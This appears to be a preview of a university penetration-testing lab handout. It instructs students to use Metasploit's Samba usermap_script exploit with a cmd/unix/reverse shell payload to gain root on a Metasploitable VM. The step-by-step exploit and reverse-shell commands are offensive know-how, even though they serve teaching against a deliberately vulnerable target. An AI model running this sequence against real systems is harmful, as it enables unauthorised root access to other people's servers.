ThreatProtectionTestingLab1RemoteCodeInjection(Samba)onMetasploitableVM

docx

School

Full Sail University *

*We aren’t endorsed by this school

Course

CYB4381

Subject

Information Systems

Date

Feb 20, 2024

Type

docx

Pages

2

Uploaded by JusticeMink2465

Report
Threat Protection & Testing Lab 1 – Remote Code Injection (Samba) on Metasploitable VM 1. Login into FullSail lab environment 2. Browse to your Kali VM a. Obtain your local IP address by opening the terminal and typing ifconfig b. Obtain the local IP address of the Metasplotiable VM 3. Perform a nmap scan against the Metasploitable VM Note: Notice that port 445 is open 4. Launch the msfconsole 5. After the msfconsole is up, run this command “search samba”
6. Copy “exploit/multi/samba/usermap_script” and run this command “use exploit/multi/samba/usermap_script” 7. Next, run the command “show payloads” 8. After listing the payloads, run the “set payload cmd/unix/reverse” command 9. Now we must set the remote hosts (Metasploitable VM IP address) and its 445 port. We must also set the local host using the Kali VM IP address. 10. Run “exploit” once targets are set 11. Students must now provide screenshots as evidence that they have obtained root access from the Kali VM to the Metasplotibale VM. a. Students must provide the hostname i. Run the “hostname” command b. Students must provide the server version of the hacked VM i. Run the “uname -a” command c. Students must provide whoami information i. Run the “whoami” command 12. Copy the screenshots into a Word document and save it with your first name_last_name_Threat Protection & Testing_Week 1_Lab1. 13. Upload the document to FSO for a grade.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help